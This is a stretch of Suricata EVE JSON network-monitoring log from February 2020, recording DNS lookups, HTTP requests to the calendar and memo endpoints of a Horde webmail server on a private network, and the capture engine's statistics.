{"timestamp":"2020-02-29T00:10:21.866749+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41533,"proto":"UDP","dns":{"type":"answer","id":12570,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.444617+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24342}} {"timestamp":"2020-02-29T00:10:22.621298+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24342},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:10:22.629755+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33644,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:10:22.738168+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44212,"proto":"UDP","dns":{"type":"answer","id":33644,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:22.738168+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44212,"proto":"UDP","dns":{"type":"answer","id":33644,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.795647+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:10:22.795647+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:10:22.824684+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":2}} {"timestamp":"2020-02-29T00:10:22.840079+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42445,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23346,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:22.948426+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42445,"proto":"UDP","dns":{"type":"answer","id":23346,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:22.948426+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42445,"proto":"UDP","dns":{"type":"answer","id":23346,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.978088+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53812,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2192,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:23.086656+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53812,"proto":"UDP","dns":{"type":"answer","id":2192,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:23.086656+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53812,"proto":"UDP","dns":{"type":"answer","id":2192,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:23.129248+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} 
{"timestamp":"2020-02-29T00:10:23.129248+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:10:23.175862+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:10:23.175862+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:10:24.000668+0000","event_type":"stats","stats":{"uptime":14276,"capture":{"kernel_packets":134365,"kernel_drops":0},"decoder":{"pkts":134408,"bytes":92797098,"invalid":185,"ipv4":132931,"ipv6":8,"ethernet":134408,"raw":0,"null":0,"sll":0,"tcp":127724,"udp":5007,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2737,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2753,"synack":2744,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1777,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2286,"failed_udp":110},"tx":{"http":4582,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2365}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2341,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_
global":0},"http":{"memuse":80040,"memcap":0}}} {"timestamp":"2020-02-29T00:10:25.000291+0000","flow_id":374562667837138,"event_type":"flow","src_ip":"192.168.10.122","src_port":41142,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:23.472786+0000","end":"2020-02-29T00:05:23.581640+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:26.069213+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52175,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40996,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:26.177585+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52175,"proto":"UDP","dns":{"type":"answer","id":40996,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:26.177585+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52175,"proto":"UDP","dns":{"type":"answer","id":40996,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:26.234777+0000","flow_id":1124421027940285,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752}} 
{"timestamp":"2020-02-29T00:10:28.134129+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34788,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:10:28.134889+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":3}} {"timestamp":"2020-02-29T00:10:30.000411+0000","flow_id":893553631413293,"event_type":"flow","src_ip":"192.168.10.122","src_port":51580,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:29.640045+0000","end":"2020-02-29T00:05:29.748633+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:31.000321+0000","event_type":"stats","stats":{"uptime":14283,"capture":{"kernel_packets":134418,"kernel_drops":0},"decoder":{"pkts":134436,"bytes":92807270,"invalid":185,"ipv4":132957,"ipv6":8,"ethernet":134436,"raw":0,"null":0,"sll":0,"tcp":127747,"udp":5010,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2738,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2754,"synack":2745,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1779,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2287,"failed_udp":110},"tx":{"http":4583,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2366}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2342,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18847,"memcap_state":0,"memcap_global":0},"http":{"memuse":98031,"memcap":0}}} 
{"timestamp":"2020-02-29T00:10:31.235722+0000","flow_id":1124421027940285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52714,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:10:32.001842+0000","flow_id":1021062620573906,"event_type":"flow","src_ip":"192.168.10.122","src_port":33976,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.454866+0000","end":"2020-02-29T00:05:30.563509+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:32.002075+0000","flow_id":214948798715515,"event_type":"flow","src_ip":"192.168.10.122","src_port":60298,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.841339+0000","end":"2020-02-29T00:05:30.949739+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:32.002142+0000","flow_id":113437246634505,"event_type":"flow","src_ip":"192.168.10.122","src_port":41347,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.670217+0000","end":"2020-02-29T00:05:30.778890+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:35.072059+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35187,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54980,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:35.180346+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35187,"proto":"UDP","dns":{"type":"answer","id":54980,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:35.180346+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35187,"proto":"UDP","dns":{"type":"answer","id":54980,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:35.205288+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} 
{"timestamp":"2020-02-29T00:10:35.205288+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":21,"tx_id":0}} {"timestamp":"2020-02-29T00:10:38.000235+0000","event_type":"stats","stats":{"uptime":14290,"capture":{"kernel_packets":134438,"kernel_drops":0},"decoder":{"pkts":134448,"bytes":92809310,"invalid":185,"ipv4":132969,"ipv6":8,"ethernet":134448,"raw":0,"null":0,"sll":0,"tcp":127757,"udp":5012,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2739,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2755,"synack":2746,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1780,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,
"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2288,"failed_udp":110},"tx":{"http":4584,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2367}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2346,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":85424,"memcap":0}}} {"timestamp":"2020-02-29T00:10:39.238217+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:10:39.249184+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45590,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43423,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:39.357577+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45590,"proto":"UDP","dns":{"type":"answer","id":43423,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:39.357577+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45590,"proto":"UDP","dns":{"type":"answer","id":43423,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:39.423600+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:10:39.423600+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":203,"tx_id":1}} {"timestamp":"2020-02-29T00:10:39.436232+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4741,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
